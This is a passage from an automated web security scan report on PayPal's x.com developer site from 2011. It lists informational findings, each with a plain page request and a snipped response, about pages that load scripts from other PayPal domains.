<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.88. https://www.x.com/community/ppx/xspaces/web_checkout/soap  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/web_checkout/soap

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/xspaces/web_checkout/soap HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:46 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036313b31342c323035373b31342c323232343b31342c323236363b31342c323035343b31342c323236383b31342c323034393b31342c323034383b31342c323131323b31342c323035313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:46 GMT; Path=/
Vary: User-Agent
JP: D=130212 t=1313157046417943
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.89. https://www.x.com/community/xcommerce-blogs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /community/xcommerce-blogs?view=blog HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/index.jspa
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323030383b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:38:42 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323237363b31342c323030383b; Expires=Sun, 11-Sep-2011 13:38:43 GMT; Path=/
Vary: User-Agent
JP: D=97775 t=1313156323515835
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...

7.90. https://www.x.com/community/xcommerce-blogs/blog/2011/06/07/adobe-to-arm-xcommerce-retailers-with-customer-data-to-help-them-sell-more  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/2011/06/07/adobe-to-arm-xcommerce-retailers-with-customer-data-to-help-them-sell-more

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /community/xcommerce-blogs/blog/2011/06/07/adobe-to-arm-xcommerce-retailers-with-customer-data-to-help-them-sell-more HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:27 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323037333b31342c323232363b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b33382c353939353b33382c363039373b33382c363233383b33382c363238353b33382c363030363b33382c363133383b33382c363330313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:28 GMT; Path=/
Vary: User-Agent
JP: D=114399 t=1313157088244606
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...

7.91. https://www.x.com/community/xcommerce-blogs/blog/2011/06/08/how-may-we-serve-you-better  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/2011/06/08/how-may-we-serve-you-better

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /community/xcommerce-blogs/blog/2011/06/08/how-may-we-serve-you-better HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:27 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323037333b31342c323232363b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b33382c363030363b33382c363233383b33382c363039373b33382c363133383b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:27 GMT; Path=/
Vary: User-Agent
JP: D=132206 t=1313157087884897
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...

7.92. https://www.x.com/community/xcommerce-blogs/blog/2011/06/26/are-you-headed-to-fowa  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/2011/06/26/are-you-headed-to-fowa

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /community/xcommerce-blogs/blog/2011/06/26/are-you-headed-to-fowa HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:26 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323232363b31342c323030323b31342c323037333b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b33382c363039373b33382c363133383b33382c363233383b33382c363330313b33382c363238353b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:27 GMT; Path=/
Vary: User-Agent
JP: D=143677 t=1313157087084685
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...

7.93. https://www.x.com/community/xcommerce-blogs/blog/2011/07/04/paypal-x-developer-challenge-for-android-vote-now-for-peoples-choice-award  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/2011/07/04/paypal-x-developer-challenge-for-android-vote-now-for-peoples-choice-award

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /community/xcommerce-blogs/blog/2011/07/04/paypal-x-developer-challenge-for-android-vote-now-for-peoples-choice-award HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:25 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030323b31342c323037333b31342c323232363b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b33382c363133383b33382c363233383b33382c363330313b33382c363238353b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:26 GMT; Path=/
Vary: User-Agent
JP: D=99334 t=1313157086694004
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...

7.94. https://www.x.com/community/xcommerce-blogs/blog/2011/07/18/our-infrastructure-plans  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/2011/07/18/our-infrastructure-plans

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /community/xcommerce-blogs/blog/2011/07/18/our-infrastructure-plans HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:25 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030323b31342c323232363b31342c323037333b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b33382c363233383b33382c363330313b33382c363238353b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:26 GMT; Path=/
Vary: User-Agent
JP: D=79734 t=1313157086409698
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...

7.95. https://www.x.com/community/xcommerce-blogs/blog/2011/07/28/xcommerce-innovate-developer-conference-2011--registration-open  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/2011/07/28/xcommerce-innovate-developer-conference-2011--registration-open

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /community/xcommerce-blogs/blog/2011/07/28/xcommerce-innovate-developer-conference-2011--registration-open HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:25 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030323b31342c323037333b31342c323232363b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:26 GMT; Path=/
Vary: User-Agent
JP: D=108461 t=1313157085908464
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...

7.96. https://www.x.com/community/xcommerce-blogs/blog/2011/08/02/winners-of-paypals-third-developer-challenge-revealed  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/2011/08/02/winners-of-paypals-third-developer-challenge-revealed

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /community/xcommerce-blogs/blog/2011/08/02/winners-of-paypals-third-developer-challenge-revealed HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:24 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030323b31342c323232363b31342c323037333b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b33382c363330313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:25 GMT; Path=/
Vary: User-Agent
JP: D=96364 t=1313157085618096
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...

7.97. https://www.x.com/community/xcommerce-blogs/blog/tags/adobe  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/tags/adobe

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /community/xcommerce-blogs/blog/tags/adobe HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:31 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=64900 t=1313157092486237
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...

7.98. https://www.x.com/community/xcommerce-blogs/blog/tags/andriod  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/tags/andriod

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /community/xcommerce-blogs/blog/tags/andriod HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:29 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=58771 t=1313157090149552
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...

7.99. https://www.x.com/community/xcommerce-blogs/blog/tags/apps  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/tags/apps

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /community/xcommerce-blogs/blog/tags/apps HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:28 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=109572 t=1313157089606900
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...

7.100. https://www.x.com/community/xcommerce-blogs/blog/tags/challenge  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/tags/challenge

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /community/xcommerce-blogs/blog/tags/challenge HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:28 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=58835 t=1313157089118525
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...

7.101. https://www.x.com/community/xcommerce-blogs/blog/tags/developer  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/tags/developer

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /community/xcommerce-blogs/blog/tags/developer HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:27 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=80688 t=1313157088773338
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...

7.102. https://www.x.com/community/xcommerce-blogs/blog/tags/developer_network  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/tags/developer_network

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /community/xcommerce-blogs/blog/tags/developer_network HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:30 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=124691 t=1313157091604811
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...

7.103. https://www.x.com/community/xcommerce-blogs/blog/tags/ebay  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/tags/ebay

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /community/xcommerce-blogs/blog/tags/ebay HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:30 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=106975 t=1313157091188070
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...

7.104. https://www.x.com/community/xcommerce-blogs/blog/tags/paypal  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/tags/paypal

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /community/xcommerce-blogs/blog/tags/paypal HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:30 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=95566 t=1313157090807467
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...

7.105. https://www.x.com/community/xcommerce-blogs/blog/tags/winners  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/tags/winners

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /community/xcommerce-blogs/blog/tags/winners HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:29 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=68066 t=1313157090473016
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...

7.106. https://www.x.com/community/xcommerce-blogs/blog/tags/x.commerce  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/tags/x.commerce

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /community/xcommerce-blogs/blog/tags/x.commerce HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:31 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=61485 t=1313157092752771
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...

7.107. https://www.x.com/community/xcommerce-blogs/blog/tags/xcommerce  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/tags/xcommerce

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /community/xcommerce-blogs/blog/tags/xcommerce HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:31 GMT
